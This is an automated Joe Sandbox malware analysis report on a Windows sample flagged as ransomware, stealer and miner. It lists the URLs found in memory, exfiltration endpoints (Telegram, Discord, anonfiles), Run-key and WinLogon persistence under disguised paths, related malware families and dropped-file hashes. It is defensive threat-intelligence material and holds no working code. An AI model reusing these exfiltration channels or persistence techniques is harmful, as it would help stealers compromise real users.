                                        https://www.openssl.org/Hbased.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2581670053.00007FFDFBAA6000.00000004.00000001.01000000.0000001D.sdmp, based.exe, 00000008.00000002.2529240083.00007FFDFB742000.00000004.00000001.01000000.0000001E.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.anonfiles.com/uploadrUbased.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://google.com/mailbased.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379742963.00000273ED760000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://support.mozilla.orgbased.exe, 00000008.00000003.1856585098.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1865608051.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1865608051.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1823417228.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1841596618.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868829846.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1841596618.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesbased.exe, 00000008.00000003.2259677546.00000273EDA25000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pybased.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378472989.00000273ED090000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1752876018.00000273ED015000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377891389.00000273EC858000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1749896560.00000273ED01B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1745966741.00000273ED02B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmbased.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753857795.00000273ED3A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.google.com/based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://foss.heptapod.net/pypy/pypy/-/issues/3539based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.amazon.de/based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://ip-api.com/line/?fields=hostingbased.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        208.95.112.1
                                        ip-api.comUnited States
                                        53334TUT-ASUSfalse
                                        149.154.167.220
                                        api.telegram.orgUnited Kingdom
                                        62041TELEGRAMRUtrue
                                        162.159.138.232
                                        discord.comUnited States
                                        13335CLOUDFLARENETUStrue
                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1486327
                                        Start date and time:2024-08-02 00:06:08 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 14m 39s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:105
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:VaTlw2kNGc.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:21dd41d299117fe5c556afc317f9fcbf.exe
                                        Detection:MAL
                                        Classification:mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@163/125@3/3
                                        EGA Information:
                                        • Successful, ratio: 85.7%
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
                                        • Excluded IPs from analysis (whitelisted): 142.250.186.131
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, pool.hashvault.pro, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target hacn.exe, PID 6584 because there are no executed function
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtOpenFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: VaTlw2kNGc.exe
                                        TimeTypeDescription
                                        18:07:08API Interceptor1x Sleep call for process: setup.exe modified
                                        18:07:12API Interceptor1x Sleep call for process: WMIC.exe modified
                                        18:07:13API Interceptor149x Sleep call for process: powershell.exe modified
                                        18:07:58API Interceptor341x Sleep call for process: based.exe modified
                                        18:07:58API Interceptor1x Sleep call for process: conhost.exe modified
                                        23:07:23Task SchedulerRun new task: dasHost path: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
                                        23:07:23Task SchedulerRun new task: dasHostd path: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
                                        23:07:25Task SchedulerRun new task: dwm path: "C:\Program Files\Mozilla Firefox\dwm.exe"
                                        23:07:25Task SchedulerRun new task: dwmd path: "C:\Program Files\Mozilla Firefox\dwm.exe"
                                        23:07:25Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
                                        23:07:25Task SchedulerRun new task: powershell path: "C:\Recovery\powershell.exe"
                                        23:07:26Task SchedulerRun new task: powershellp path: "C:\Recovery\powershell.exe"
                                        23:07:26Task SchedulerRun new task: winlogon path: "C:\Recovery\winlogon.exe"
                                        23:07:26Task SchedulerRun new task: winlogonw path: "C:\Recovery\winlogon.exe"
                                        23:07:26Task SchedulerRun new task: wouVpTZDoyPyABKEH path: "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe"
                                        23:07:26Task SchedulerRun new task: wouVpTZDoyPyABKEHw path: "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe"
                                        23:07:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
                                        23:07:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wouVpTZDoyPyABKEH "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe"
                                        23:07:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
                                        23:07:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Recovery\winlogon.exe"
                                        23:08:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Mozilla Firefox\dwm.exe"
                                        23:08:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
                                        23:08:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wouVpTZDoyPyABKEH "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe"
                                        23:08:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
                                        23:08:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Recovery\winlogon.exe"
                                        23:08:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Mozilla Firefox\dwm.exe"
                                        23:09:00AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
                                        23:09:09AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run wouVpTZDoyPyABKEH "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe"
                                        23:09:17AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
                                        23:09:26AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Recovery\winlogon.exe"
                                        23:09:34AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Mozilla Firefox\dwm.exe"
                                        23:09:50AutostartRun: WinLogon Shell "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
                                        23:09:58AutostartRun: WinLogon Shell "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe"
                                        23:10:07AutostartRun: WinLogon Shell "C:\Recovery\powershell.exe"
                                        23:10:15AutostartRun: WinLogon Shell "C:\Recovery\winlogon.exe"
                                        23:10:23AutostartRun: WinLogon Shell "C:\Program Files\Mozilla Firefox\dwm.exe"
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        208.95.112.1HnvcpgZOtM.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        7ICY2krDqo.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        jyz52R1C6Y.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        jigm8567e0.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        VfoanAPxNA.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        JzWHmWfXBX.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        qaaf5QSSPk.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        52i8S0bosh.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        DHL INVOICE_99765.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • ip-api.com/line/?fields=hosting
                                        149.154.167.220TRE87656789000.bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          172250106616751cd7ad430f8c6bf21e469473814327035184ca6f9c9349f2dcc6c11cde07393.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            SOA July Payment.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                Purchase Order PO11420.docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  REVISED UPDATE424 PO.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    e-dekont.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      new order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        Document.exeGet hashmaliciousVIP KeyloggerBrowse
                                                          dI8tI8Lr5S.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                            162.159.138.232Zoom_workspace.htaGet hashmaliciousCobalt Strike, Clipboard HijackerBrowse
                                                              qqgv6uKJOd.exeGet hashmaliciousClipboard HijackerBrowse
                                                                http://discord-proxy.tassadar2002.workers.dev/Get hashmaliciousUnknownBrowse
                                                                  http://dapi.190823.xyz/Get hashmaliciousUnknownBrowse
                                                                    LisectAVT_2403002A_147.exeGet hashmaliciousBlank GrabberBrowse
                                                                      LisectAVT_2403002A_368.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                                                        Setup 3.0.0.msiGet hashmaliciousUnknownBrowse
                                                                          DD Spotify Acc Gen.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                            LisectAVT_2403002A_260.exeGet hashmaliciousPython Stealer, Blank Grabber, Rose Stealer, XmrigBrowse
                                                                              95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exeGet hashmaliciousBdaejecBrowse
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                discord.com8Ck8T5qRcC.exeGet hashmaliciousBlank Grabber, DCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                • 162.159.136.232
                                                                                Zoom_workspace.htaGet hashmaliciousCobalt Strike, Clipboard HijackerBrowse
                                                                                • 162.159.138.232
                                                                                SecuriteInfo.com.Python.Muldrop.16.5435.25481.exeGet hashmaliciousBlank GrabberBrowse
                                                                                • 162.159.137.232
                                                                                EJH8vdN1sP.exeGet hashmaliciousBlank GrabberBrowse
                                                                                • 162.159.137.232
                                                                                TamenuV11.msiGet hashmaliciousUnknownBrowse
                                                                                • 162.159.135.232
                                                                                http://discord-proxy.tassadar2002.workers.dev/Get hashmaliciousUnknownBrowse
                                                                                • 162.159.138.232
                                                                                http://dapi.190823.xyz/Get hashmaliciousUnknownBrowse
                                                                                • 162.159.138.232
                                                                                http://via.evove.topGet hashmaliciousUnknownBrowse
                                                                                • 162.159.136.232
                                                                                LisectAVT_2403002A_147.exeGet hashmaliciousBlank GrabberBrowse
                                                                                • 162.159.138.232
                                                                                LisectAVT_2403002A_210.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                • 162.159.128.233
                                                                                ip-api.comHnvcpgZOtM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                7ICY2krDqo.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                jyz52R1C6Y.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                jigm8567e0.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                VfoanAPxNA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                JzWHmWfXBX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                qaaf5QSSPk.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                52i8S0bosh.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                DHL INVOICE_99765.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 208.95.112.1
                                                                                api.telegram.orgTRE87656789000.bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                172250106616751cd7ad430f8c6bf21e469473814327035184ca6f9c9349f2dcc6c11cde07393.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                83MZfLKh7D.exeGet hashmaliciousAsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLineBrowse
                                                                                • 149.154.167.220
                                                                                SOA July Payment.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Purchase Order PO11420.docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                REVISED UPDATE424 PO.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                e-dekont.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 149.154.167.220
                                                                                new order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Document.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                TELEGRAMRUhttp://ava.game.naver.com.sg.ryo.biz.id/Get hashmaliciousUnknownBrowse
                                                                                • 149.154.167.99
                                                                                https://www.levada.ru/2024/05/16/konflikt-s-ukrainoj-massovye-otsenki-aprelya-2024-goda/Get hashmaliciousUnknownBrowse
                                                                                • 149.154.167.99
                                                                                TRE87656789000.bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                • 149.154.167.99
                                                                                172250106616751cd7ad430f8c6bf21e469473814327035184ca6f9c9349f2dcc6c11cde07393.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                SOA July Payment.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Purchase Order PO11420.docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                REVISED UPDATE424 PO.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                e-dekont.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 149.154.167.220
                                                                                CLOUDFLARENETUShttp://telstra-104348.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                • 104.18.86.42
                                                                                http://ebay38.cc/Get hashmaliciousUnknownBrowse
                                                                                • 172.67.195.180
                                                                                http://tok2np0ckht.top/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 104.18.24.93
                                                                                http://35-ghf4g44.mytechguards.com/Get hashmaliciousUnknownBrowse
                                                                                • 188.114.96.3
                                                                                http://telegxawm.com/Get hashmaliciousUnknownBrowse
                                                                                • 1.1.1.1
                                                                                http://ava.game.naver.com.sg.ryo.biz.id/Get hashmaliciousUnknownBrowse
                                                                                • 172.67.173.192
                                                                                https://nym1-ib.adnxs.com/click2?e=wqT_3QKZAfBDmQAAAAMAxBkFAQiIoM-zBhCJo_aKxfvCoioYgeDOtoOlx-YOIIy_9g4omAIwuGg4kQRAuq2d7gFI8opOUABaA1VTRGIBBYhoAXABeJmgZ4ABAIgBAZABApgBBaABAqkBNzgR_dr64z-xAREKLLkBAAAAQDMz_z_BAREUAMkVChzYAY69AuABAA../s=fd215fa3f6c45164ae9790e4c04714dce2356091/bcr=AAAAAAAA8D8=/pp=0.62/bn=0/clickenc=//lilypet.com.br/rarr/jhfhnfknf/aWFuLnJvZ2Vyc0BsbWcubmV0Get hashmaliciousEvilProxyBrowse
                                                                                • 172.67.74.152
                                                                                https://banc.my.site.com/login?c=ZYrHywz6_hUlMaLTq7yANGaWrFtU7WNMxvT588Ncq6E3EW0F49R00yKaOHj_pxG8IStDNBdWzFe2n1WxBmAMJMyQtF_2W6XAwnXQ9MMgMQ41u__8HKlI7IF0a3bkEu9CgoUiNbteevKCtijEBGcHHhHBrV6zcfFhZq708qKbglaE7LUwo1sL0LiKmbMaLcsCSwV4YpwIxcBUmxSaqJVUUQD4rCQhLA%3D%3DGet hashmaliciousUnknownBrowse
                                                                                • 104.18.86.42
                                                                                http://email.trumpdigitaltradecards.comGet hashmaliciousUnknownBrowse
                                                                                • 172.67.140.207
                                                                                http://77.90.38.170/sos.txtGet hashmaliciousUnknownBrowse
                                                                                • 1.1.1.1
                                                                                TUT-ASUSHnvcpgZOtM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                7ICY2krDqo.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                jyz52R1C6Y.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                jigm8567e0.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                VfoanAPxNA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                JzWHmWfXBX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                qaaf5QSSPk.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                52i8S0bosh.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                DHL INVOICE_99765.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 208.95.112.1
                                                                                No context
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                C:\Program Files\Mozilla Firefox\dwm.exe87Bym0x4Fy.exeGet hashmaliciousBlank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                  8Ck8T5qRcC.exeGet hashmaliciousBlank Grabber, DCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                    C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe87Bym0x4Fy.exeGet hashmaliciousBlank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                      8Ck8T5qRcC.exeGet hashmaliciousBlank Grabber, DCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                        C:\Program Files\Google\Chrome\updater.exe87Bym0x4Fy.exeGet hashmaliciousBlank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                          8Ck8T5qRcC.exeGet hashmaliciousBlank Grabber, DCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                            TS-240605-Millenium1.exeGet hashmaliciousBlank Grabber, Discord Token Stealer, Millenuim RAT, XmrigBrowse
                                                                                              DevxExecutor.exeGet hashmaliciousPython Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RATBrowse
                                                                                                hacn.exeGet hashmaliciousDiscord Token Stealer, Millenuim RAT, XmrigBrowse
                                                                                                  Process:C:\ProgramData\setup.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5617152
                                                                                                  Entropy (8bit):7.71585644239634
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                                                  MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                  SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
                                                                                                  SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                                                  SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: 87Bym0x4Fy.exe, Detection: malicious, Browse
                                                                                                  • Filename: 8Ck8T5qRcC.exe, Detection: malicious, Browse
                                                                                                  • Filename: TS-240605-Millenium1.exe, Detection: malicious, Browse
                                                                                                  • Filename: DevxExecutor.exe, Detection: malicious, Browse
                                                                                                  • Filename: hacn.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (797), with no line terminators
                                                                                                  Category:dropped
